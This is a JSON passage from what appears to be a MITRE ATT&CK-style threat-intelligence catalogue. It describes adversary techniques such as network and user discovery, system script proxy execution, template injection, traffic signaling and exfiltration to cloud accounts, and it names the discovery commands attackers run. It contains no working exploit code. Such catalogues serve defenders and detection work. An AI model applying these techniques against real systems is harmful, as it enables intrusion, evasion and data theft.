"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "adb6b8c1-2bdb-42b9-95da-5ce07e8796f7",
|
||
"value": "System Network Configuration Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.<sup>[[Amazon AWS VPC Guide](https://app.tidalcyber.com/references/7972332d-fbe9-4f14-9511-4298f65f2a86)]</sup><sup>[[Microsoft Azure Virtual Network Overview](https://app.tidalcyber.com/references/bf7f2e7a-f5ae-4b6e-8c90-fd41a92c4615)]</sup><sup>[[Google VPC Overview](https://app.tidalcyber.com/references/9ebe53cf-657f-475d-85e4-9e30f4af1e7d)]</sup> Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.\n\nUtilities and commands that acquire this information include [netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491), \"net use,\" and \"net session\" with [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc). In Mac and Linux, [netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to \"net session\". Additionally, built-in features native to network devices and [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "0d258912-58b1-4982-b90f-eed576f05ffc",
|
||
"value": "System Network Connections Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://app.tidalcyber.com/technique/86e6f1f0-290b-4971-b50e-80e98a0a768b) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.<sup>[[show_ssh_users_cmd_cisco](https://app.tidalcyber.com/references/11d34884-4559-57ad-8910-54e517c6493e)]</sup><sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "86e6f1f0-290b-4971-b50e-80e98a0a768b",
|
||
"value": "System Owner/User Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.<sup>[[LOLBAS Project](https://app.tidalcyber.com/references/14b1d3ab-8508-4946-9913-17e667956064)]</sup> This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.<sup>[[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e0d1825e-e46a-48f2-9b28-8346a39d39b0",
|
||
"value": "System Script Proxy Execution"
|
||
},
|
||
{
|
||
"description": "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.\n\nAdversaries may use the information from [System Service Discovery](https://app.tidalcyber.com/technique/e0a347e2-2ac5-458b-ab0f-18d81b6d6055) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e0a347e2-2ac5-458b-ab0f-18d81b6d6055",
|
||
"value": "System Service Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://app.tidalcyber.com/technique/f8aa018b-5134-4201-87f2-e55d20f40b17)), but adversaries can also abuse services for one-time or temporary execution.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "a2300ed3-a502-4fe4-bad5-4aa1efc72941",
|
||
"value": "System Services"
|
||
},
|
||
{
|
||
"description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) (e.g. <code>reload</code>).<sup>[[Microsoft Shutdown Oct 2017](https://app.tidalcyber.com/references/c587f021-596a-4e63-ac51-afa2793a859d)]</sup><sup>[[alert_TA18_106A](https://app.tidalcyber.com/references/26b520dc-5c68-40f4-82fb-366d27fc0c2f)]</sup>\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) or [Inhibit System Recovery](https://app.tidalcyber.com/technique/d207c03b-fbe7-420e-a053-339f4650c043), to hasten the intended effects on system availability.<sup>[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "24787dca-6afd-4ab3-ab6c-32e9486ec418",
|
||
"value": "System Shutdown/Reboot"
|
||
},
|
||
{
|
||
"description": "An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or <code>systemsetup</code> on macOS.<sup>[[MSDN System Time](https://app.tidalcyber.com/references/5e15e03b-be8b-4f3d-a3ae-0df7a4ecfbec)]</sup><sup>[[Technet Windows Time Service](https://app.tidalcyber.com/references/0d908e07-abc1-40fc-b147-9b9fd483b262)]</sup><sup>[[systemsetup mac time](https://app.tidalcyber.com/references/a85bd111-a2ca-5e66-b90e-f52ff780fc5c)]</sup> These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.<sup>[[Mac Time Sync](https://app.tidalcyber.com/references/b36dd8af-045d-57b0-b0a9-45d831fe6373)]</sup><sup>[[linux system time](https://app.tidalcyber.com/references/2dfd22d7-c78b-5967-b732-736f37ea5489)]</sup>\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) on Windows by performing <code>net time \\\\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>.<sup>[[Technet Windows Time Service](https://app.tidalcyber.com/references/0d908e07-abc1-40fc-b147-9b9fd483b262)]</sup> In addition, adversaries can discover device uptime through functions such as <code>GetTickCount()</code> to determine how long it has been since the system booted up.<sup>[[Virtualization/Sandbox Evasion](https://app.tidalcyber.com/references/a3031616-f21a-574f-a9a5-a808a6230aa8)]</sup>\n\nOn network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `show clock detail` can be used to see the current time configuration.<sup>[[show_clock_detail_cisco_cmd](https://app.tidalcyber.com/references/a2215813-31b0-5624-92d8-479e7bd1a30b)]</sup>\n\nIn addition, system calls – such as <code>time()</code> – have been used to collect the current time on Linux devices.<sup>[[MAGNET GOBLIN](https://app.tidalcyber.com/references/955b6449-4cd5-5512-a5f3-2bcb91def3ef)]</sup> On macOS systems, adversaries may use commands such as <code>systemsetup -gettimezone</code> or <code>timeIntervalSinceNow</code> to gather current time zone information or current date and time.<sup>[[System Information Discovery Technique](https://app.tidalcyber.com/references/6123fbd4-c6fc-504c-92f2-5d405730c298)]</sup><sup>[[ESET DazzleSpy Jan 2022](https://app.tidalcyber.com/references/212012ac-9084-490f-8dd2-5cc9ac6e6de1)]</sup>\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8)<sup>[[RSA EU12 They're Inside](https://app.tidalcyber.com/references/8330ab88-9c73-4332-97d6-c1fb95b1a155)]</sup>, or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://app.tidalcyber.com/technique/90e6a093-3e87-4d74-8b68-38c7d7e5e93c)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.<sup>[[AnyRun TimeBomb](https://app.tidalcyber.com/references/cd369bf9-80a8-426f-a0aa-c9745b40696c)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "2e634ff1-a4ea-41b4-8ee9-23db4627a986",
|
||
"value": "System Time Discovery"
|
||
},
|
||
{
|
||
"description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://app.tidalcyber.com/technique/bfde0a09-8109-41e4-b8c9-68fe20e8131b) of directory .LNK files that use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to look like the real directories, which are hidden through [Hidden Files and Directories](https://app.tidalcyber.com/technique/14e81a2d-9eca-429c-9fb9-08e109de9f6c). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. <sup>[[Retwin Directory Share Pivot](https://app.tidalcyber.com/references/027c5274-6b61-447a-9058-edb844f112dd)]</sup>\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "58987d0d-2ebf-4783-90ac-5164fe9b9e43",
|
||
"value": "Taint Shared Content"
|
||
},
|
||
{
|
||
"description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.<sup>[[Microsoft Open XML July 2017](https://app.tidalcyber.com/references/8145f894-6477-4629-81de-1dd26070ee0a)]</sup>\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.<sup>[[SANS Brian Wiltse Template Injection](https://app.tidalcyber.com/references/8c010c87-865b-4168-87a7-4a24db413def)]</sup> These documents can be delivered via other techniques such as [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) and/or [Taint Shared Content](https://app.tidalcyber.com/technique/58987d0d-2ebf-4783-90ac-5164fe9b9e43) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.<sup>[[Redxorblue Remote Template Injection](https://app.tidalcyber.com/references/bce1cd78-b55e-40cf-8a90-64240db867ac)]</sup> Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.<sup>[[MalwareBytes Template Injection OCT 2017](https://app.tidalcyber.com/references/7ef0ab1f-c7d6-46fe-b489-fab4db623e0a)]</sup>\n\nAdversaries may also modify the <code>*\\template</code> control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.<sup>[[Proofpoint RTF Injection](https://app.tidalcyber.com/references/8deb6edb-293f-4b9d-882a-541675864eb5)]</sup><sup>[[Ciberseguridad Decoding malicious RTF files](https://app.tidalcyber.com/references/82d2451b-300f-4891-b1e7-ade53dff1126)]</sup>\n\nThis technique may also enable [Forced Authentication](https://app.tidalcyber.com/technique/e732e1d4-fffa-4fc3-b387-47782c821688) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.<sup>[[Anomali Template Injection MAR 2018](https://app.tidalcyber.com/references/3cdeb2a2-9582-4725-a132-6503dbe04e1d)]</sup><sup>[[Talos Template Injection July 2017](https://app.tidalcyber.com/references/175ea537-2a94-42c7-a83b-bec8906ee6b9)]</sup><sup>[[ryhanson phishery SEPT 2016](https://app.tidalcyber.com/references/7e643cf0-5df7-455d-add7-2342f36bdbcb)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "02b8e7c1-0db7-43f5-a5bc-531b30395122",
|
||
"value": "Template Injection"
|
||
},
|
||
{
|
||
"description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://app.tidalcyber.com/technique/34a112db-c61d-4ea2-872f-de3fc1af87a3)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r <sup>[[Hartrell cd00r 2002](https://app.tidalcyber.com/references/739e6517-10f5-484d-8000-8818d63e7341)]</sup>, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://app.tidalcyber.com/technique/195aa08b-15fd-4019-b905-8f31bc5e2094) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup><sup>[[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup> To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) due to the monolithic nature of the architecture.\n\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.<sup>[[Bleeping Computer - Ryuk WoL](https://app.tidalcyber.com/references/f6670b73-4d57-4aad-8264-1d42d585e280)]</sup><sup>[[AMD Magic Packet](https://app.tidalcyber.com/references/06d36dea-e13d-48c4-b6d6-0c175c379f5b)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c2cf211a-9676-4922-a386-69697ab4934a",
|
||
"value": "Traffic Signaling"
|
||
},
|
||
{
|
||
"description": "Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.\n\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.<sup>[[TLDRSec AWS Attacks](https://app.tidalcyber.com/references/b8de9dd2-3c57-5417-a24f-0260dff6afc6)]</sup>\n\nAdversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.<sup>[[Microsoft Azure Storage Shared Access Signature](https://app.tidalcyber.com/references/9031357f-04ac-5c07-a59d-97b9e32edf79)]</sup>\n\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.<sup>[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)]</sup> ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Office 365",
|
||
"SaaS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ab4f22d6-465f-4a16-8a40-693f2234c4ac",
|
||
"value": "Transfer Data to Cloud Account"
|
||
},
|
||
{
|
||
"description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.<sup>[[engima0x3 DNX Bypass](https://app.tidalcyber.com/references/e0186f1d-100d-4e52-b6f7-0a7e1c1a35f0)]</sup><sup>[[engima0x3 RCSI Bypass](https://app.tidalcyber.com/references/0b815bd9-6c7f-4bd8-9031-667fa6252f89)]</sup><sup>[[Exploit Monday WinDbg](https://app.tidalcyber.com/references/abd5f871-e12e-4355-af72-d4be79cb0291)]</sup><sup>[[LOLBAS Tracker](https://app.tidalcyber.com/references/f0e368f1-3347-41ef-91fb-995c3cb07707)]</sup> These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "8811114c-a0cf-479c-b95d-c036467749e3",
|
||
"value": "Trusted Developer Utilities Proxy Execution"
|
||
},
|
||
{
|
||
"description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) used by the other party for access to internal network systems may be compromised and used.<sup>[[CISA IT Service Providers](https://app.tidalcyber.com/references/b8bee7f9-155e-4765-9492-01182e4435b7)]</sup>\n\nIn Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.<sup>[[Office 365 Delegated Administration](https://app.tidalcyber.com/references/fa0ed0fd-bf57-4a0f-9370-e22f27b20e42)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "7549c2f9-b5d2-4773-90ed-42f668aecacf",
|
||
"value": "Trusted Relationship"
|
||
},
|
||
{
|
||
"description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://app.tidalcyber.com/technique/065d1cca-8ca5-4f8b-a333-2340706f589e)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://app.tidalcyber.com/technique/cdac2469-52ca-42a8-aefe-0321a7e3d658)), or other specialized files/artifacts (e.g. [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a)).<sup>[[Brining MimiKatz to Unix](https://app.tidalcyber.com/references/5ad06565-6694-4c42-81c9-880d66f6d07f)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Containers",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "02ed857b-ba39-4fab-b1d9-3ed2aa689dfd",
|
||
"value": "Unsecured Credentials"
|
||
},
|
||
{
|
||
"description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\n\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\n\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\n\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f), which can cost organizations substantial amounts of money over time depending on the processing power used.<sup>[[CloudSploit - Unused AWS Regions](https://app.tidalcyber.com/references/7c237b73-233f-4fe3-b4a6-ce523fd82853)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "edf9f7d7-bc14-4e25-800d-f508acb580d4",
|
||
"value": "Unused/Unsupported Cloud Regions"
|
||
},
|
||
{
|
||
"description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.<sup>[[NIST Authentication](https://app.tidalcyber.com/references/f3cfb9b9-62f4-4066-a2b9-7e6f25bd7a46)]</sup><sup>[[NIST MFA](https://app.tidalcyber.com/references/2f069bb2-3f59-409e-a337-7c69411c8b01)]</sup>\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "28f65214-95c1-4a72-b385-0b32cbcaea8f",
|
||
"value": "Use Alternate Authentication Material"
|
||
},
|
||
{
|
||
